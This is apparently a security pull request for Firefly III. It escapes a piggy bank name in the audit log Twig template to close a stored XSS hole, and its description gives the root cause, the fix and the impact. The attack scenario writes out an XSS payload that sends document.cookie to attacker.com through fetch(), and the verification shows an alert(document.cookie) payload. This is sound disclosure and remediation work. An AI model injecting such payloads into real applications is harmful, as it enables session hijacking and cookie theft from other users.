### PR TITLE
Fix stored XSS in audit log view via piggy bank name (ale.twig)

### DIFF
--- a/resources/views/list/ale.twig
+++ b/resources/views/list/ale.twig
@@ -104,10 +104,10 @@
                     <code>{{ logEntry.after }}</code>
                 {% endif %}
                 {% if 'add_to_piggy' == logEntry.action %}
-                    {{ trans('firefly.ale_action_log_add', {amount: formatAmountBySymbol(logEntry.after.amount, logEntry.after.currency_symbol, logEntry.after.decimal_places, true), name: logEntry.after.piggy})|raw }}
+                    {{ trans('firefly.ale_action_log_add', {amount: formatAmountBySymbol(logEntry.after.amount, logEntry.after.currency_symbol, logEntry.after.decimal_places, true), name: logEntry.after.piggy|e})|raw }}
                 {% endif %}
                 {% if 'remove_from_piggy' == logEntry.action %}
-                    {{ trans('firefly.ale_action_log_remove', {amount: formatAmountBySymbol(logEntry.after.amount, logEntry.after.currency_symbol, logEntry.after.decimal_places, true), name: logEntry.after.piggy})|raw }}
+                    {{ trans('firefly.ale_action_log_remove', {amount: formatAmountBySymbol(logEntry.after.amount, logEntry.after.currency_symbol, logEntry.after.decimal_places, true), name: logEntry.after.piggy|e})|raw }}
                 {% endif %}
             </td>
 


### PR DESCRIPTION
## Security Fix — Stored XSS in Audit Log Entry View (CWE-79)

### Summary

The Twig template `resources/views/list/ale.twig` renders the piggy bank name from `AuditLogEntry.after.piggy` using the `|raw` filter, which bypasses Twig's auto-escaping. A piggy bank created with an HTML payload in its name executes arbitrary JavaScript in any browser viewing that transaction's audit log.

### Root Cause

The `|raw` filter is required on the outer expression to preserve `<span>` tags in the `amount` parameter (used for currency styling). However, this also disables escaping for the user-controlled `name` parameter, creating a stored XSS sink.

**Vulnerable code (`ale.twig` lines 107, 110):**
```twig
{# name: logEntry.after.piggy is raw user input — not escaped #}
{{ trans('firefly.ale_action_log_add', {amount: formatAmountBySymbol(...), name: logEntry.after.piggy})|raw }}
{{ trans('firefly.ale_action_log_remove', {amount: formatAmountBySymbol(...), name: logEntry.after.piggy})|raw }}
```

### Fix

Apply `|e` (HTML escape) to only the `name` parameter before substitution into `trans()`. The `|raw` on the outer expression is preserved so `amount` HTML is not broken.

```twig
{{ trans('firefly.ale_action_log_add', {amount: formatAmountBySymbol(...), name: logEntry.after.piggy|e})|raw }}
{{ trans('firefly.ale_action_log_remove', {amount: formatAmountBySymbol(...), name: logEntry.after.piggy|e})|raw }}
```

### Attack Scenario

1. Attacker creates a piggy bank with name: `<img src=x onerror=fetch('https://attacker.com?c='+document.cookie)>`
2. A transaction rule fires with action "Add money to piggy bank" → `UpdatePiggyBank` stores an `AuditLogEntry` with the raw name in `after.piggy`
3. Any user who views `/transactions/show/{id}` has JavaScript executed in their browser

### Impact

- **Type**: Stored XSS (CWE-79)
- **Auth required**: Yes (any authenticated user)
- **User interaction**: Victim must view the transaction audit log
- **Affected actions**: `add_to_piggy` and `remove_from_piggy` rule actions
- **Consequence**: Session hijacking, cookie theft, CSRF-like actions chained

### Verification

Confirmed on Firefly III v6.6.2 — raw HTML payload present in server response:
```html
Added <span class="text-success money-positive">EUR 50.00</span> to piggy bank
"<img src=x onerror=alert(document.cookie)>"
```